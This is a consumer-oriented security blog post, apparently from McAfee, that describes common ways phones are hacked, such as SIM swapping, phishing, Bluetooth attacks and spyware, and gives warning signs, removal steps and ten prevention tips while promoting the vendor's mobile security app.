How do hackers hack phones? In several ways. But also, there are several ways you can prevent it from happening to you. The thing is that our phones are like little treasure chests. They’re loaded with plenty of personal data, and we use them to shop, bank, and take care of other personal and financial matters—all of which are of high value to identity thieves. However, you can protect yourself and your phone by knowing what to look out for and by taking a few simple steps. Let’s break it down by first understanding what phone hacking is, taking a look at some common attacks, and learning how you can prevent it.

What is phone hacking?

Phone hacking refers to any method where an unauthorized third party gains access to your smartphone and its data. This isn’t just one single technique; it covers a wide range of cybercrimes. A phone hack can happen through software vulnerabilities, like the spyware campaigns throughout the years that could monitor calls and messages. It can also occur over unsecured networks, such as a hacker intercepting your data on public Wi-Fi. Sometimes, it’s as simple as physical access, where someone installs tracking software on an unattended device. 

Types of smartphone hacks and attacks

Hackers have multiple avenues of attacking your phone. Among these common methods are using malicious apps disguised as legitimate software, exploiting the vulnerabilities of unsecure public Wi-Fi networks, or deploying sophisticated zero-click exploits that require no interaction from you at all. The most common method, however, remains social engineering, where they trick you into giving them access. Let’s further explore these common hacking techniques below.

Hacking software

Whether hackers sneak it onto your phone by physically accessing your phone or by tricking you into installing it via a phony app, a sketchy website, or a phishing attack, hacking software can create problems for you in a couple of ways:

• Keylogging: In the hands of a hacker, keylogging works like a stalker by snooping information as you type, tap, and even talk on your phone.
• Trojans: Trojans are malware disguised in your phone to extract important data, such as credit card account details or personal information.

Some possible signs of hacking software on your phone include:

• A battery that drains way too quickly.
• Your phone runs a little sluggish or gets hot.
• Apps quit suddenly or your phone shuts off and turns back on.
• You see unrecognized data, text, or other charges on your bill.

In all, hacking software can eat up system resources, create conflicts with other apps, and use your data or internet connection to pass your personal information into the hands of hackers.

Phishing attacks

This classic form of attack has been leveled at our computers for years. Phishing is where hackers impersonate a company or trusted individual to get access to your accounts or personal info or both. These attacks take many forms such as emails, texts, instant messages, and so forth, some of which can look really legitimate. Common to them are links to bogus sites that attempt to trick you into handing over personal info or that install malware to wreak havoc on your device or likewise steal information. Learning to spot a phishing attack is one way to keep yourself from falling victim to one.

Bluetooth hacking

Professional hackers can use dedicated technologies that search for vulnerable mobile devices with an open Bluetooth connection. Hackers can pull off these attacks when they are within range of your phone, up to 30 feet away, usually in a populated area. When hackers make a Bluetooth connection to your phone, they might access your data and info, yet that data and info must be downloaded while the phone is within range. This is a more sophisticated attack given the effort and technology involved.

SIM card swapping

In August of 2019, then CEO of Twitter had his phone hacked by SIM card swapping scam. In this type of scam, a hacker contacts your phone provider, pretends to be you, then asks for a replacement SIM card. Once the provider sends the new SIM to the hacker, the old SIM card is deactivated, and your phone number will be effectively stolen. This enables the hacker to take control of your phone calls, messages, among others. The task of impersonating someone else seems difficult, yet it happened to the CEO of a major tech company, underscoring the importance of protecting your personal info and identity online to prevent hackers from pulling off this and other crimes.

Vishing or voice phishing

While a phone call itself cannot typically install malware on your device, it is a primary tool for social engineering, known as vishing or voice phishing. A hacker might call, impersonating your bank or tech support company, and trick you into revealing sensitive information like passwords or financial details. They might also try to convince you to install a malicious app. Another common tactic is the “one-ring” scam, where they hang up hoping you’ll call back a premium-rate number. To stay safe, be wary of unsolicited calls, never provide personal data, block suspicious numbers, and check that your call forwarding isn’t enabled.

Low-power mode hacks

Generally, a phone that is powered off is a difficult target for remote hackers. However, modern smartphones aren’t always truly off. Features like Apple’s Find My network can operate in a low-power mode, keeping certain radios active. Furthermore, if a device has been previously compromised with sophisticated firmware-level malware, it could activate upon startup. The more common risk involves data that was already stolen before the phone was turned off or if the device is physically stolen. While it’s an uncommon scenario, the only sure way to take a device offline and completely sever all power is by removing the battery, where possible.

Camera hacks

Hacking a phone’s camera is referred to as camfecting, usually done through malware or spyware hidden within a rogue application. Once installed, these apps can gain unauthorized permission to access your camera and record video or capture images without your knowledge. Occasionally, vulnerabilities in a phone’s operating system (OS) have been discovered that could allow for this, though these are rare and usually patched quickly. Protect yourself by regularly reviewing app permissions in your phone’s settings—for both iOS and Android—and revoking camera access for any app that doesn’t absolutely need it. Always keep your OS and apps updated to the latest versions.

Android vs. iPhone: Which is harder to hack?

This is a long-standing debate with no simple answer. iPhones are generally considered more secure due to Apple’s walled garden approach: a closed ecosystem, a strict vetting process for the App Store, and timely security updates for all supported devices. Android’s open-source nature offers more flexibility but also creates a more fragmented ecosystem, where security updates can be delayed depending on the device manufacturer. However, both platforms use powerful security features like application sandboxing. 

The most important factor is not the brand but your behavior. A user who practices good digital hygiene—using strong passwords, avoiding suspicious links, and vetting apps—is well-protected on any platform.

Signs your phone has been hacked

Detecting a phone hack early can save you from significant trouble. Watch for key red flags: your battery draining much faster than usual, unexpected spikes in your mobile data usage, a persistently hot device even when idle, or a sudden barrage of pop-up ads. You might also notice apps you don’t remember installing or find that your phone is running unusually slow. To check, go into your settings to review your battery and data usage reports for any strange activity. The most effective step you can take is to install a comprehensive security app, like McAfee® Mobile Security, to run an immediate scan and detect any threats.

How to remove a hacker from your phone

Discovering that your phone has been hacked can be alarming, but acting quickly can help you regain control and protect your personal information. Here are the urgent steps to take so you can remove the hacker, secure your accounts, and prevent future intrusions.

1. Disconnect immediately: Turn on Airplane Mode to cut off the hacker’s connection to your device via Wi-Fi and cellular data.
2. Run an antivirus scan: Use a reputable mobile security app to scan your phone, and identify and remove malicious software.
3. Review and remove apps: Manually check your installed applications. Delete any you don’t recognize or that look suspicious. While you’re there, review app permissions and revoke access for any apps that seem overly intrusive.
4. Change your passwords: Using a separate, secure device, change the passwords for your critical accounts immediately—especially for your email, banking, and social media.
5. Perform a factory reset: For persistent infections, a factory reset is the most effective solution. This will wipe all data from your phone, so ensure you have a clean backup—the time before you suspected a hack—to restore from.
6. Monitor your accounts: After securing your device, keep a close eye on your financial and online accounts for any unauthorized activity.

10 tips to prevent your phone from being hacked

While there are several ways a hacker can get into your phone and steal personal and critical information, here are a few tips to keep that from happening:

1. Use comprehensive security software. We’ve gotten into the good habit of using this on our desktop and laptop computers. Our phones? Not so much. Installing security software on your smartphone gives you a first line of defense against attacks, plus additional security features.
2. Update your phone OS and its apps. Keeping your operating system current is the primary way to protect your phone. Updates fix vulnerabilities that cybercriminals rely on to pull off their malware-based attacks. Additionally, those updates can help keep your phone and apps running smoothly while introducing new, helpful features.
3. Stay safe on the go with a VPN. One way that crooks hack their way into your phone is via public Wi-Fi at airports, hotels, and even libraries. This means your activities are exposed to others on the network—your bank details, password, all of it. To make a public network private and protect your data, use a virtual private network.
4. Use a password manager. Strong, unique passwords offer another primary line of defense, but juggling dozens of passwords can be a task, thus the temptation to use and reuse simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software will include one.
5. Avoid public charging stations. Charging your device at a public station seems so convenient. However, some hackers have been known to juice jack by installing malware into the charging station, while stealing your passwords and personal info. Instead, bring a portable power pack that you can charge ahead of time. They’re pretty inexpensive and easy to find.
6. Keep your eyes on your phone. Many hacks happen simply because a phone falls into the wrong hands. This is a good case for password or PIN protecting your phone, as well as turning on device tracking to locate your phone or wipe it clean remotely if you need to. Apple and Google provide their users with a step-by-step guide for remotely wiping devices.
7. Encrypt your phone. Encrypting your cell phone can save you from being hacked and can protect your calls, messages, and critical information. To check if your iPhone is encrypted, go into Touch ID & Passcode, scroll to the bottom, and see if data protection is enabled. Typically, this is automatic if you have a passcode enabled. Android users have automatic encryption depending on the type of phone.
8. Lock your SIM card. Just as you can lock your phone, you can also lock the SIM card that is used to identify you, the owner, and to connect you to your cellular network. Locking it keeps your phone from being used on any other network than yours. If you own an iPhone, you can lock it by following these simple directions. For other platforms, check out the manufacturer’s website.
9. Turn off your Wi-Fi and Bluetooth when not in use. Think of it as closing an open door. As many hacks rely on both Wi-Fi and Bluetooth to be performed, switching off both can protect your privacy in many situations. You can easily turn off both from your settings by simply pulling down the menu on your home screen.
10. Steer clear of unvetted third-party app stores. Google Play and Apple’s App Store have measures in place to review and vet apps, and ensure that they are safe and secure. Third-party sites may not have that process and might intentionally host malicious apps. While some cybercriminals have found ways to circumvent Google and Apple’s review process, downloading a safe app from them is far greater than anywhere else.

Final thoughts

Your smartphone is central to your life, so protecting it is essential. Ultimately, your proactive security habits are your strongest defense against mobile hacking. Make a habit of keeping your operating system and apps updated, be cautious about the links you click and the networks you join, and use a comprehensive security solution like McAfee® Mobile Security.

By staying vigilant and informed, you can enjoy all the benefits of your mobile device with confidence and peace of mind. Stay tuned to McAfee for the latest on how to protect your digital world from emerging threats.

The post How Do Hackers Hack Phones and How Can I Prevent It? appeared first on McAfee Blog.